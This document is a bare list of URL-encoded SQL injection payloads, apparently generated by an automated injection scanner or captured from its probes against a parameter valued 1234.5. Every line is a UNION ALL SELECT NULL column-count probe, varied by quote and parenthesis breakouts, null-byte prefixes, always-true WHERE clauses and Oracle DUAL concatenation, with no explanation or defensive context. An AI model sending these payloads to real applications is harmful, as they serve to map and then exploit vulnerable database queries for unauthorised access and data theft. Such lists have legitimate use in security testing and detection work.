1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%202368%3D2368%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201324%3D1324%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201034%3D1034%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%208057%3D8057%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%205441%3D5441%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%207320%3D7320%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%209747%3D9747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%205270%3D5270%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%201513%3D1513%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20WHERE%203489%3D3489%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%201175%3D1175%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%209549%3D9549%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%206296%3D6296%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207269%3D7269%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%208184%3D8184%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%204943%3D4943%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%206809%3D6809%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205174%3D5174%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%205452%3D5452%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20WHERE%207525%3D7525%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204472%3D4472%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%209467%3D9467%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206450%3D6450%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%208938%3D8938%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203619%3D3619%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204233%3D4233%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203734%3D3734%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%206680%3D6680%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%203516%3D3516%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20WHERE%204462%3D4462%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%204554%3D4554%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%208136%3D8136%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%209171%3D9171%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%208712%3D8712%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206484%3D6484%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%201030%3D1030%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%206110%3D6110%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%205494%3D5494%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%201853%3D1853%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%209101%3D9101%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%203916%3D3916%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%205239%3D5239%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%209434%3D9434%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%201614%3D1614%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206363%3D6363%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202212%3D2212%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%203422%3D3422%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206664%3D6664%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202459%3D2459%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206249%3D6249%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%205063%3D5063%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%205753%3D5753%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%204828%3D4828%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%204903%3D4903%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%205800%3D5800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%201110%3D1110%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%202925%3D2925%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209847%3D9847%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%202554%3D2554%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%206438%3D6438%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27bKOz%27%20FROM%20DUAL%20WHERE%206054%3D6054%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27VcJH%27%20FROM%20DUAL%20WHERE%208535%3D8535%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27VefZ%27%20FROM%20DUAL%20WHERE%205326%3D5326%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ksBq%27%20FROM%20DUAL%20WHERE%205037%3D5037%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27nlvb%27%20FROM%20DUAL%20WHERE%206023%3D6023%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27HffE%27%20FROM%20DUAL%20WHERE%204254%3D4254%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27fUzq%27%20FROM%20DUAL%20WHERE%205703%3D5703%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27fvmW%27%20FROM%20DUAL%20WHERE%204726%3D4726%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ogEw%27%20FROM%20DUAL%20WHERE%204461%3D4461%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27KHJk%27%20FROM%20DUAL%20WHERE%204294%3D4294%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27nTFT%27%20WHERE%206945%3D6945%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27JHaI%27%20WHERE%204149%3D4149%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27BQAT%27%20WHERE%208973%3D8973%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27Tedo%27%20WHERE%206063%3D6063%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ReeG%27%20WHERE%207810%3D7810%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27KPiO%27%20WHERE%203826%3D3826%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27HfxH%27%20WHERE%201952%3D1952%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27wBNS%27%20WHERE%204433%3D4433%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27lOaV%27%20WHERE%204187%3D4187%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27WDpr%27%20WHERE%206008%3D6008%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Zafu%20WHERE%201988%3D1988%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20OrSW%20WHERE%205138%3D5138%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20tClH%20WHERE%201239%3D1239%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20oxmR%20WHERE%206192%3D6192%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20aycM%20WHERE%204889%3D4889%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20vmwO%20WHERE%203139%3D3139%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Mgqq%20WHERE%205595%3D5595%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20yBOe%20WHERE%203890%3D3890%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20aKgs%20WHERE%207878%3D7878%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 